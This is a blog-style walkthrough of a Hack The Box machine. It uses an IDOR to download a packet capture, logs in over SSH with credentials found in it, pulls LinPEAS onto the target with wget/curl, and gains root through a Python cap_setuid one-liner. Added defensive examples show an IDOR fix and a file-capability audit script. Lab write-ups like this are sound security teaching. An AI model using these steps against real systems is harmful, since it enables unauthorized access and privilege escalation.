I’m back! Life came at me all at once, with a new job, trip around Asia, Christmas break and then coming back to settling in on things.
This post has been sitting in my drafts for approximately 1.5 months now, and I have more to come so stay tuned!
This was a fairly straightforward box, allowing us to gain the root flag via a vulnerability found with LinPEAS.
Recon
As always, we start out with some simple recon with nmap:
nmap 10.10.10.245 -sV --script=banner
I use the banner-grabbing script in case there is any additional information behind the banners on the ports searched, of which we find two:
21/tcp open ftp     vsftpd 3.0.3
22/tcp open ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http    gunicorn
Port 80 likely indicates there is a webpage available. We’ll keep that in mind for now and move on to running a gobuster scan:
gobuster dir -u http://10.10.10.245 -w /usr/share/seclists/Discovery/Web-Content/common.txt
We immediately have some more information to work with from this scan:

When navigating to the /data directory, we’re prompted to download a .pcap file for use in Wireshark. The most important thing to note here is that this takes us to /data/1, so what happens if we navigate to /data/0?
This downloads a .pcap file with a lot more information than we would have received from the website during that time.
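The /data/&lt;id&gt; behaviour above is an insecure direct object reference (IDOR): the server hands out whichever capture id is requested. As an added example (not code from the post or from the box's own web app), here is a lookup that trusts the id alone next to a hardened one that also requires the record to belong to the requester. The Capture type, the CAPTURES store and the sample contents are constructed.

```python
# Added example, not code from the post or from the box's own web app:
# the /data/<id> behaviour above is an insecure direct object reference
# (IDOR). A lookup that trusts the id alone is shown next to a hardened
# one that also requires the record to belong to the requester.
# The Capture type, CAPTURES store and sample contents are constructed.

from dataclasses import dataclass


@dataclass(frozen=True)
class Capture:
    capture_id: int
    owner: str
    pcap: bytes  # constructed stand-in for the capture file contents


# Constructed store: capture 0 was produced by an admin session,
# capture 1 by the user "nathan".
CAPTURES = {
    0: Capture(0, "admin", b"<constructed pcap: admin traffic>"),
    1: Capture(1, "nathan", b"<constructed pcap: nathan traffic>"),
}


class NotFound(Exception):
    """Raised when no capture is served for the requested id."""


def get_capture_vulnerable(requester: str, capture_id: int) -> bytes:
    """Vulnerable: the id is the only input, so any logged-in user can
    walk /data/0, /data/1, ... and read other users' captures."""
    cap = CAPTURES.get(capture_id)
    if cap is None:
        raise NotFound(capture_id)
    return cap.pcap


def get_capture_hardened(requester: str, capture_id: int) -> bytes:
    """Hardened: the lookup is scoped to the requester's own records.
    Missing and not-owned both map to NotFound so that the response
    does not confirm which ids exist for other users."""
    cap = CAPTURES.get(capture_id)
    if cap is None or cap.owner != requester:
        raise NotFound(capture_id)
    return cap.pcap


def is_denied(handler, requester: str, capture_id: int) -> bool:
    """True if the handler refuses the request (used to compare the two)."""
    try:
        handler(requester, capture_id)
    except NotFound:
        return True
    return False


if __name__ == "__main__":
    for handler in (get_capture_vulnerable, get_capture_hardened):
        print(handler.__name__, "nathan -> /data/0 denied:",
              is_denied(handler, "nathan", 0))
```

The ownership check is the minimum fix; serving captures under random, unguessable identifiers instead of a sequential counter removes the enumeration path as well, but it is not a substitute for the check.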
Foothold
Inside this .pcap file we are provided with two new IPs:
192.168.196.1
192.168.196.16
However, running nmap on both of these provides us with a bad gateway. No luck!
Further reading through the .pcap file, we stumbled across something interesting: what appears to be some credentials, specifically a username and password for a user named nathan.
From here, I spent some time attempting to find a login page on the webpage to no avail. After some frustration, I remembered that SSH port 22 was open on this IP!
Connecting to the box IP with the user credentials we found was a success, and we’re able to gain the user flag.
Priv Esc
Now that we have a foothold on the machine, it’s time to look at escalating the session to root.
Creating a simple FTP client on our attacking machine in a separate terminal window, we can copy LinPeas over. I’ll do a separate post in future on LinPeas, but essentially this is a vulnerability scanning script to look for potential privilege escalation opportunities on Linux machines, and is also available for Windows.
For now though, we’ll keep it simple and use LinPeas, which can be downloaded here:
You can transfer the files easily from your attacker machine to the remote system with the following method:
On the attacker machine:
- Navigate to /tmp: cd /tmp
- Download the file you want to move
- Run python3 -m http.server 12345
On the remote system:
- wget http://IP:12345/FILE, where IP is your tun0 IP and FILE is the file name.
- If wget is not available, you can also use curl: curl http://IP:12345/FILE -o FILENAME, where the -o flag sets the name the file will have on the remote system.
With LinPEAS now copied over, we can make it executable with chmod +x linpeas.sh and run it.

We immediately identify that this system is vulnerable to CVE-2021-3560. To exploit this, it’s easiest to use Metasploit.
- Open Metasploit and use the module ssh_login
- Set the fields for the user credentials we gathered earlier
Once the Metasploit SSH session is connected, search for and run the exploit:
/linux/local/polkit_dbus_auth_bypass
And… it failed? Let’s move on to Plan B.
Plan B – Binary Exploitation
Checking our LinPEAS output, we can find that there is another high-probability finding detected: /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
Checking GTFOBins, specifically for Python, we are able to find cap_setuid specifically mentioned. By running this one-liner with a slight modification to the python path, we can elevate to root:
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
And success! If we enter whoami, we find out we are root. We can navigate into /root/, where we can find the flag!
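The finding that made this escalation possible is a file capability, which is what getcap -r / reports and what LinPEAS surfaced above. As an added example (not code from the post or from LinPEAS), here is a small audit that parses getcap output and flags capabilities which let a binary change its uid; both output styles are handled, "path = caps+flags" (older libcap) and "path caps=flags" (libcap 2.41+). SAMPLE_GETCAP and the DANGEROUS set are constructed assumptions.

```python
# Added example, not code from the post or from LinPEAS: a small audit that
# parses `getcap -r /` output and flags file capabilities which let a binary
# change its uid, i.e. the finding above. Both output styles are handled:
# "path = caps+flags" (older libcap) and "path caps=flags" (libcap 2.41+).
# SAMPLE_GETCAP and the DANGEROUS set are constructed assumptions.

import re

# Capabilities that, granted to an interpreter or any binary a user can
# drive, are equivalent to root. Starting point, not an exhaustive list.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
}

# Constructed getcap output; the python3.8 line mirrors the LinPEAS finding.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/mtr-packet cap_net_raw=ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_sys_nice=ep
"""

LINE_RE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<sets>\S.*)$")
# One clause: comma-separated capability names, an operator, flag letters
# (e = effective, i = inheritable, p = permitted).
CLAUSE_RE = re.compile(r"([a-z0-9_,]+)([+=])([eip]*)")


def parse_getcap_line(line):
    """Return (path, {capability: flags}) or None for an unparsable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    caps = {}
    for names, _op, flags in CLAUSE_RE.findall(m.group("sets")):
        for name in names.split(","):
            if name:
                caps[name] = flags
    return m.group("path"), caps


def audit_getcap(lines):
    """Return [(path, capability, flags)] for every dangerous capability that
    is in the permitted set ('p'). Inheritable-only grants are not flagged."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        for name, flags in caps.items():
            if name in DANGEROUS and "p" in flags:
                findings.append((path, name, flags))
    return findings


if __name__ == "__main__":
    for path, name, flags in audit_getcap(SAMPLE_GETCAP.splitlines()):
        print(f"{path}: {name} ({flags})")
```

On a real host, feed it the output of getcap -r / 2>/dev/null; anything it reports on an interpreter or a binary users can run with their own arguments should be removed with setcap -r, since the capability is effectively a root shell for every local user.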
Room Complete!
This was a fairly simple and straightforward room, using prior knowledge from my time on TryHackMe, as well as knowledge I’ve gained from Hack The Box (more write-ups coming soon!).